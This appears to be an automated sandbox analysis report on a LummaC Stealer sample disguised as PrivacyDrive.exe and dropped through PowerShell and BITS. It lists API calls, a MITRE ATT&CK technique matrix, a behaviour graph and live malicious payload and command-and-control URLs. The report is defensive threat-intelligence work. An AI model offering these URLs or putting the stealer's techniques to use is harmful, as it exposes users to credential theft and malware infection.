    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00414200 GetLocalTime,4_2_00414200
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00476750 LookupAccountNameW,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,4_2_00476750
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004A83C0 _memset,_memset,GetVersionExW,4_2_004A83C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040D05C RpcBindingFree,LeaveCriticalSection,4_2_0040D05C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040D0B0 WaitForSingleObject,WaitForSingleObject,EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,CloseHandle,4_2_0040D0B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CDF0 EnterCriticalSection,RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,RpcEpResolveBinding,RpcStringFreeW,RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,4_2_0040CDF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CEEC RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,4_2_0040CEEC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CF40 EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,4_2_0040CF40

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Deobfuscate/Decode Files or Information    		1
    Input Capture    		1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API    		1
    BITS Jobs    		1
    Access Token Manipulation    		3
    Obfuscated Files or Information    		LSASS Memory1
    Account Discovery    		Remote Desktop Protocol1
    Input Capture    		21
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts12
    Service Execution    		12
    Windows Service    		12
    Windows Service    		1
    DLL Side-Loading    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin Shares2
    Clipboard Data    		3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts3
    PowerShell    		1
    Registry Run Keys / Startup Folder    		11
    Process Injection    		1
    Masquerading    		NTDS45
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd1
    Bootkit    		1
    Registry Run Keys / Startup Folder    		41
    Virtualization/Sandbox Evasion    		LSA Secrets61
    Security Software Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Access Token Manipulation    		Cached Domain Credentials41
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    BITS Jobs    		DCSync2
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
    Process Injection    		Proc Filesystem11
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Bootkit    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519581 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 51 racedsuitreow.shop 2->51 53 finalstepgo.com 2->53 55 candleduseiwo.shop 2->55 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 6 other signatures 2->67 9 cmd.exe 1 2->9         started        12 PrivacyDrive.exe 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 process4 dnsIp5 75 Suspicious powershell command line found 9->75 17 powershell.exe 16 52 9->17         started        22 conhost.exe 9->22         started        24 WerFault.exe 21 12->24         started        59 127.0.0.1 unknown unknown 14->59 signatures6 process7 dnsIp8 49 finalstepgo.com 185.255.122.133, 443, 49730, 49734 ICMESE Netherlands 17->49 39 C:\Users\user\AppData\...\PrivacyDrive.exe, PE32 17->39 dropped 69 Powershell uses Background Intelligent Transfer Service (BITS) 17->69 71 Loading BitLocker PowerShell Module 17->71 73 Powershell drops PE file 17->73 26 PrivacyDrive.exe 17->26         started        41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 24->41 dropped file9 signatures10 process11 dnsIp12 57 racedsuitreow.shop 172.67.206.221, 443, 49744, 49745 CLOUDFLARENETUS United States 26->57 77 Contains functionality to infect the boot sector 26->77 30 WerFault.exe 19 16 26->30         started        33 WerFault.exe 2 16 26->33         started        35 WerFault.exe 16 26->35         started        37 WerFault.exe 2 26->37         started        signatures13 process14 file15 43 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->43 dropped 45 C:\ProgramData\Microsoft\...\Report.wer, Unicode 33->45 dropped 47 C:\ProgramData\Microsoft\...\Report.wer, Unicode 35->47 dropped

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://ocsp.thawte.com00%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
    https://racedsuitreow.shop/P100%Avira URL Cloudmalware
    https://g.live.com/odclientsettings/ProdV2.C:0%Avira URL Cloudsafe
    https://finalstepgo.com/100%Avira URL Cloudmalware
    covvercilverow.shop100%Avira URL Cloudmalware
    https://racedsuitreow.shop/apiJV&100%Avira URL Cloudmalware
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
    https://racedsuitreow.shop/apiU.h100%Avira URL Cloudmalware
    https://finalstepgo.com/uploads/il222.zip100%Avira URL Cloudmalware
    pumpkinkwquo.shop100%Avira URL Cloudmalware
    http://crl.ver)0%Avira URL Cloudsafe
    abortinoiwiam.shop100%Avira URL Cloudmalware
    deallyharvenw.shop100%Avira URL Cloudmalware
    http://www.privacy-drive.comx0%Avira URL Cloudsafe
    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
    https://www.thawte.com/cps00%Avira URL Cloudsafe
    https://finalstepgo.com/uploads/il222.zipK100%Avira URL Cloudmalware
    https://finalstepgo.com:443/uploads/il222.zip100%Avira URL Cloudmalware
    https://www.cloudflare.com/learning/access-ma0%Avira URL Cloudsafe
    defenddsouneuw.shop100%Avira URL Cloudmalware
    https://racedsuitreow.shop/apiV100%Avira URL Cloudmalware
    priooozekw.shop100%Avira URL Cloudmalware
    https://racedsuitreow.shop/100%Avira URL Cloudmalware
    https://racedsuitreow.shop/)e3100%Avira URL Cloudmalware
    https://g.live.com/odclientsettings/ProdV20%Avira URL Cloudsafe
    https://finalstepgo.com/a100%Avira URL Cloudmalware
    https://racedsuitreow.shop/apisP100%Avira URL Cloudmalware
    https://g.live.com/odclientsettings/Prod.C:0%Avira URL Cloudsafe
    https://racedsuitreow.shop/api100%Avira URL Cloudmalware
    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%Avira URL Cloudsafe
    https://racedsuitreow.shop/3100%Avira URL Cloudmalware
    surroundeocw.shop100%Avira URL Cloudmalware
    https://www.thawte.com/cps0/0%Avira URL Cloudsafe
    racedsuitreow.shop100%Avira URL Cloudmalware
    https://racedsuitreow.shop:443/api100%Avira URL Cloudmalware
    https://www.thawte.com/repository0W0%Avira URL Cloudsafe
    candleduseiwo.shop100%Avira URL Cloudmalware
    https://racedsuitreow.shop/apie100%Avira URL Cloudmalware
    https://www.cybertronsoft.com0%Avira URL Cloudsafe
    http://crl.thawte.com/ThawtePremiumServerCA.crl00%Avira URL Cloudsafe
    https://finalstepgo.com/uploads/il2.txt100%Avira URL Cloudmalware
    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%Avira URL Cloudsafe
    https://finalstepgo.com:443/uploads/il222.zipe100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    racedsuitreow.shop
    		172.67.206.221
    		truetrue
      		unknown
      finalstepgo.com
      		185.255.122.133
      		truetrue
        		unknown
        candleduseiwo.shop
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://finalstepgo.com/uploads/il222.zipfalse
          • Avira URL Cloud: malware
          		unknown
          covvercilverow.shoptrue
          • Avira URL Cloud: malware
          		unknown
          pumpkinkwquo.shoptrue
          • Avira URL Cloud: malware
          		unknown
          abortinoiwiam.shoptrue
          • Avira URL Cloud: malware
          		unknown
          deallyharvenw.shoptrue
          • Avira URL Cloud: malware
          		unknown
          defenddsouneuw.shoptrue
          • Avira URL Cloud: malware
          		unknown
          priooozekw.shoptrue
          • Avira URL Cloud: malware
          		unknown
          https://racedsuitreow.shop/apitrue
          • Avira URL Cloud: malware
          		unknown
          surroundeocw.shoptrue
          • Avira URL Cloud: malware
          		unknown
          racedsuitreow.shoptrue
          • Avira URL Cloud: malware
          		unknown
          candleduseiwo.shoptrue
          • Avira URL Cloud: malware
          		unknown
          https://finalstepgo.com/uploads/il2.txttrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.cloudflare.com/learning/access-management/phishing-attack/PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop/PPrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://racedsuitreow.shop/apiU.hPrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ocsp.thawte.com0PrivacyDrive.exe.2.drfalse
          • URL Reputation: safe
          		unknown
          https://finalstepgo.com/svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          http://crl.ver)svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop/apiJV&PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://upx.sf.netAmcache.hve.12.drfalse
          • URL Reputation: safe
          		unknown
          http://www.privacy-drive.comxPrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.thawte.com/cps0PrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://finalstepgo.com/uploads/il222.zipKsvchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://finalstepgo.com:443/uploads/il222.zipsvchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://www.cloudflare.com/learning/access-maPrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.cloudflare.com/5xx-error-landingPrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop/apiVPrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop/PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://racedsuitreow.shop/)e3PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://finalstepgo.com/asvchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://racedsuitreow.shop/apisPPrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://crl.thawte.com/ThawteTimestampingCA.crl0PrivacyDrive.exe.2.drfalse
          • URL Reputation: safe
          		unknown
          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop/3PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://www.thawte.com/cps0/PrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.thawte.com/repository0WPrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://racedsuitreow.shop:443/apiPrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://racedsuitreow.shop/apiePrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://www.cybertronsoft.comPrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://finalstepgo.com:443/uploads/il222.zipesvchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://crl.thawte.com/ThawtePremiumServerCA.crl0PrivacyDrive.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
